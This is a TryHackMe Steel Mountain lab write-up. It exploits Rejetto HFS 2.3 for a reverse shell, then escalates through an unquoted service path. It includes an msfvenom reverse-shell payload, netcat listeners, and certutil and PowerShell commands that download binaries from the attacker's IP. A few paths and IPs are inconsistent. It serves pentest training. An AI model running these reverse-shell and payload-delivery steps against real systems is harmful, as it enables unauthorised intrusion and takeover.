TryHackMe Steel Mountain writeup

TryHackMe Steel Mountain writeup

Steel Mountain is the first machine in the “Advanced Exploitation” part of TryHackMe’s “Offensive pentesting” path.

Enumeration

By scanning the machine with nmap we can see that both port 80 and port 8080 are running the HTTP services.

Port 80 has nothing relevant. Port 8080, however, mentioned that this service is running on HttpFileServer 2.3.

By going a quick Google search, we can learn that the full name of the service is Rejetto HTTP File Server (HFS).

Let’s check for the available exploits:

searchsploit Http File Server 2.3

Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload                           | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)                      | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)                      | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution                 | windows/webapps/34852.txt

The official guide is going through the exploitation with Metasploit, but I will skip this part, as from a learning point of view it’s not so useful.


Exploitation

Let’s try out the exploit:

searchsploit -m 39161
  Exploit: Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)
      URL: https://www.exploit-db.com/exploits/39161
     Path: /usr/share/exploitdb/exploits/windows/remote/39161.py
File Type: Python script, ASCII text executable, with very long lines, with CRLF line terminators

Copied to: /THM/StillMountain/39161.py

Always read the code of the exploit before running it!

Line 35 and 36 should be changed to make this exploit work.

ip_addr = "10.11.19.53" #local IP address
local_port = "443" # Local Port number

Also, the HTTP server with nc.exe should be served on the local host. nc.exe can be found in /usr/share/windows-resources/binaries/nc.exe.

sudo python -m SimpleHTTPServer 80

Create a listener for a reverse shell:

sudo nc -nlvp 443

Run the exploit and catch the shell:

python 39161.py 10.10.114.253  8080

PrivEsc

To enumerate all possible ways to escalate privileges, we will use WinPEAS. Download it and put it in the folder where you are already running the SimpleHTTPServer.

You can download files to it by using certutil.exe. You can read more about certutil here, but syntax that we will need is:

certutil.exe -urlcache -split -f http://10.11.19.53/winPEAS.exe

The PowerShell also could be an alternative for that:

powershell -c (new-object System.Net.WebClient).DownloadFile(‘http://10.11.19.5/winPEAS.exe','C:\Users\Public\winPEAS.exe')

Run winPEAS and explore the output.

AdvancedSystemCareService9(IObit - Advanced SystemCare Service 9)[C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe] - Auto - Running - No quotes and Space detected

By checking the available exploits, we can find that this service is vulnerable to the UnquotedServicePath vulnerability.

To preview the content of the exploit, you can use -x flag of the searchsploit:

searchsploit -x 40577

The main idea here is that the binary of the service is located in the C:\Program Files\IObit\Advanced SystemCare\ folder. As the path is unquoted, an attacker could place the malicious binary named Advanced.exe to the C:\Program Files\IObit\ folder. By starting the service one more time, the C:\Program Files\IObit\Advanced.exe will be executed with system rights, instead of the C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe.

Creating a reverse shell:

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.19.53 LPORT=53 -f exe -o Advanced.exe

Open another listener for the port 53

sudo nc -nlvp 53

Download the reverse shell to the machine:

cd C:\Program Files\IObit\
certutil.exe -urlcache -split -f http://10.11.19.53/Advanced.exe

Stop and start over the service:

C:\Program Files (x86)\IObit>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9

SERVICE_NAME: AdvancedSystemCareService9
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 4  RUNNING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0



C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9

Takeaway

  • Make sure that you are enumerating all ports

  • If there is a Metasploit module, that means you can do the same thing manually

  • Always read the code of the exploit